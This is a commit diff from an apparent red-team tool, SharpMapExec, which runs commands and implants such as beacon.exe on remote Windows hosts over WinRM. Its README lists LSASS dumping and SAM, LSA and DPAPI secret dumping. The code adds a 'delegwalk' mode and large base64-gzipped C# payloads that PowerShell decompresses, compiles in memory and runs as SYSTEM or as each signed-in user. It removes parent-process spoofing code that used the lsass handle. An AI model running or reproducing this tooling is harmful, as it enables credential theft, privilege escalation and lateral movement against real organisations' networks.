STRLCPY/SharpMapExec

.vs/SharpMapExec/v16/.suo

Binary file.

■ ■ ■ ■ ■ ■

README.md

		skipped 27 lines
28	28		Available WinRm modules
29	29		/m:exec /a:whoami (Invoke-Command)
30	30		/m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
31		-	/m:comsvcs (Dump Lsass Process)
	31	+	/m:exec /a:C:\beacon.exe /delegwalk (Invoke-Command as all signed in users)
	32	+	/m:comsvcs (Dump and Parse Lsass Process)
32	33		/m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)
33	34		/m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)
34	35		/m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory)
		skipped 54 lines
89	90		Mass dump Lsass process with built-in Microsoft signed DLL and saves it to the `loot` folder
90	91
91	92		![](images/lsassdump.png)
	93	+
	94	+	Executes in all delegation processes sorted by unique by users
	95	+
	96	+	![](images/delegwalk.png)
	97	+
	98	+	Scan for SMB signing and SMBv1, Danke Pingcastle
	99	+
	100	+	![](images/smbvscan.png)
92	101
93	102		And much more!
94	103
		skipped 23 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/Class1.cs

1

-

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/NtlmWinrm.cs

		skipped 58 lines
59	59		{
60	60		flags.Add("system");
61	61		}
	62	+	if (arguments.ContainsKey("/asdelegwalk") \|\| arguments.ContainsKey("/delegwalk"))
	63	+	{
	64	+	flags.Add("delegwalk");
	65	+	}
62	66
63	67		if (arguments.ContainsKey("/domain"))
64	68		{
		skipped 88 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/kerberosWinrm.cs

		skipped 57 lines
58	58		{
59	59		moduleargument = arguments["/argument"];
60	60		}
	61	+	if (arguments.ContainsKey("/assystem") \|\| arguments.ContainsKey("/system"))
	62	+	{
	63	+	flags.Add("system");
	64	+	}
	65	+	if (arguments.ContainsKey("/asdelegwalk") \|\| arguments.ContainsKey("/delegwalk"))
	66	+	{
	67	+	flags.Add("delegwalk");
	68	+	}
61	69
62	70		if (arguments.ContainsKey("/user"))
63	71		{
		skipped 142 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Helpers/Misc.cs

		skipped 8 lines
9	9		{
10	10		internal class Misc
11	11		{
	12	+	public static string Compress(byte[] data)
	13	+	{
	14	+	using (var compressedStream = new MemoryStream())
	15	+	using (var zipStream = new GZipStream(compressedStream, CompressionMode.Compress))
	16	+	{
	17	+	zipStream.Write(data, 0, data.Length);
	18	+	zipStream.Close();
	19	+	return Convert.ToBase64String(compressedStream.ToArray());
	20	+	}
	21	+	}
	22	+
	23	+	public static byte[] Decompress(byte[] data)
	24	+	{
	25	+	using (var compressedStream = new MemoryStream(data))
	26	+	using (var zipStream = new GZipStream(compressedStream, CompressionMode.Decompress))
	27	+	using (var resultStream = new MemoryStream())
	28	+	{
	29	+	zipStream.CopyTo(resultStream);
	30	+	return resultStream.ToArray();
	31	+	}
	32	+	}
12	33		public static bool CheckHostPort(string hostname, int port, int PortScanTimeout = 2000)
13	34		{
14	35		using (var client = new TcpClient())
		skipped 50 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Helpers/PsFunction.cs

1	1		using System;
2		-	using System.Collections.Generic;
3	2		using System.IO;
4	3		using System.Text;
	4	+	using static SharpMapExec.Helpers.Misc;
5	5
6	6		namespace SharpMapExec.Helpers
7	7		{
		skipped 70 lines
78	78
79	79		public static string RunAsSystem(string command)
80	80		{
	81	+	//string csFile = Lib.Wsman.Compress(File.ReadAllBytes(@"C:\git\ConsoleApp1\System.cs"));
	82	+	string csFile = "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";
81	83		string function = @"
82		-	$Kernel32 = Add-Type -Name 'Kernel32' -Namespace 'Win32' -MemberDefinition @'
83		-	[DllImport(""kernel32.dll"")]
84		-	[return: MarshalAs(UnmanagedType.Bool)]
85		-	public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
	84	+	$b64 = '{0}'
	85	+	$output = New-Object System.IO.MemoryStream
	86	+	$Stream = New-Object IO.Compression.GZipStream([IO.MemoryStream][Convert]::FromBase64String($b64),[IO.Compression.CompressionMode]::Decompress)
	87	+	$Stream.CopyTo($output)
	88	+	$data = [System.Text.Encoding]::utf8.GetString($output.ToArray())
	89	+	add-type -Language CSharp $data
86	90
87		-	[DllImport(""kernel32.dll"", SetLastError = true)]
88		-	public static extern UInt32 WaitForSingleObject(IntPtr handle, UInt32 milliseconds);
89		-
90		-	[DllImport(""kernel32.dll"", SetLastError = true)]
91		-	[return: MarshalAs(UnmanagedType.Bool)]
92		-	public static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);
93		-
94		-	[DllImport(""kernel32.dll"", SetLastError = true)]
95		-	[return: MarshalAs(UnmanagedType.Bool)]
96		-	public static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);
97		-
98		-	[DllImport(""kernel32.dll"", SetLastError = true)]
99		-	[return: MarshalAs(UnmanagedType.Bool)]
100		-	public static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList);
101		-
102		-	[DllImport(""kernel32.dll"", SetLastError = true)]
103		-	public static extern bool CloseHandle(IntPtr hObject);
	91	+	[ConsoleApp2.Program]::System('{1}')
	92	+	";
	93	+	return String.Format(function, csFile, Convert.ToBase64String(Encoding.Unicode.GetBytes(command)));
	94	+	}
104	95
105		-	[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
106		-	public struct STARTUPINFOEX
107		-	{{
108		-	public STARTUPINFO StartupInfo;
109		-	public IntPtr lpAttributeList;
110		-	}}
111		-	[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
112		-	public struct STARTUPINFO
113		-	{{
114		-	public Int32 cb;
115		-	public string lpReserved;
116		-	public string lpDesktop;
117		-	public string lpTitle;
118		-	public Int32 dwX;
119		-	public Int32 dwY;
120		-	public Int32 dwXSize;
121		-	public Int32 dwYSize;
122		-	public Int32 dwXCountChars;
123		-	public Int32 dwYCountChars;
124		-	public Int32 dwFillAttribute;
125		-	public Int32 dwFlags;
126		-	public Int16 wShowWindow;
127		-	public Int16 cbReserved2;
128		-	public IntPtr lpReserved2;
129		-	public IntPtr hStdInput;
130		-	public IntPtr hStdOutput;
131		-	public IntPtr hStdError;
132		-	}}
133		-	[StructLayout(LayoutKind.Sequential)]
134		-	public struct PROCESS_INFORMATION
135		-	{{
136		-	public IntPtr hProcess;
137		-	public IntPtr hThread;
138		-	public int dwProcessId;
139		-	public int dwThreadId;
140		-	}}
141		-	[StructLayout(LayoutKind.Sequential)]
142		-	public struct SECURITY_ATTRIBUTES
143		-	{{
144		-	public int nLength;
145		-	public IntPtr lpSecurityDescriptor;
146		-	[MarshalAs(UnmanagedType.Bool)]
147		-	public bool bInheritHandle;
148		-	}}
149		-	[Flags]
150		-	public enum ProcessAccessFlags : uint
151		-	{{
152		-	All = 0x001F0FFF,
153		-	Terminate = 0x00000001,
154		-	CreateThread = 0x00000002,
155		-	VirtualMemoryOperation = 0x00000008,
156		-	VirtualMemoryRead = 0x00000010,
157		-	VirtualMemoryWrite = 0x00000020,
158		-	DuplicateHandle = 0x00000040,
159		-	CreateProcess = 0x000000080,
160		-	SetQuota = 0x00000100,
161		-	SetInformation = 0x00000200,
162		-	QueryInformation = 0x00000400,
163		-	QueryLimitedInformation = 0x00001000,
164		-	Synchronize = 0x00100000
165		-	}}
166		-	'@
167		-
168		-	[intptr]$parentHandle = (Get-Process 'lsass').handle
169		-	$PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000
170		-	$EXTENDED_STARTUPINFO_PRESENT = 0x00080000
171		-	$CREATE_NEW_CONSOLE = 0x00000010
172		-	$CREATE_NO_WINDOW = 0x08000000
173		-	$pInfo = (New-Object Win32.Kernel32+PROCESS_INFORMATION)
174		-	$siEx = (New-Object Win32.Kernel32+STARTUPINFOEX)
175		-	$lpValueProc = [intptr]::Zero
176		-	$lpSize = [intptr]::Zero
177		-
178		-	$null = [Win32.Kernel32]::InitializeProcThreadAttributeList(
179		-	[intptr]::Zero,
180		-	1,
181		-	0,
182		-	[ref]$lpSize #20
183		-	)
184		-	$siEx.lpAttributeList = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($lpSize)
185		-	$null = [Win32.Kernel32]::InitializeProcThreadAttributeList(
186		-	$siEx.lpAttributeList,
187		-	1,0,
188		-	[ref]$lpSize
189		-	)
190		-
191		-	$lpValueProc = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([IntPtr]::Size)
192		-	[System.Runtime.InteropServices.Marshal]::WriteIntPtr($lpValueProc,$parentHandle)
193		-
194		-	$null = [Win32.Kernel32]::UpdateProcThreadAttribute(
195		-	$siEx.lpAttributeList,0,
196		-	[IntPtr]$PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
197		-	$lpValueProc,
198		-	[intptr][IntPtr]::Size,
199		-	[intptr]::Zero,
200		-	[intptr]::Zero
201		-	)
202		-	$ps = (New-Object Win32.Kernel32+SECURITY_ATTRIBUTES)
203		-	$ts = (New-Object Win32.Kernel32+SECURITY_ATTRIBUTES)
204		-	$ps.nLength = [System.Runtime.InteropServices.Marshal]::SizeOf($ps)
205		-	$ts.nLength = [System.Runtime.InteropServices.Marshal]::SizeOf($ts)
	96	+	public static string RunDelegationWalk(string command)
	97	+	{
	98	+	//string csFile = Lib.Wsman.Compress(File.ReadAllBytes(@"C:\git\ConsoleApp1\DelegWalk.cs"));
	99	+	string csFile = "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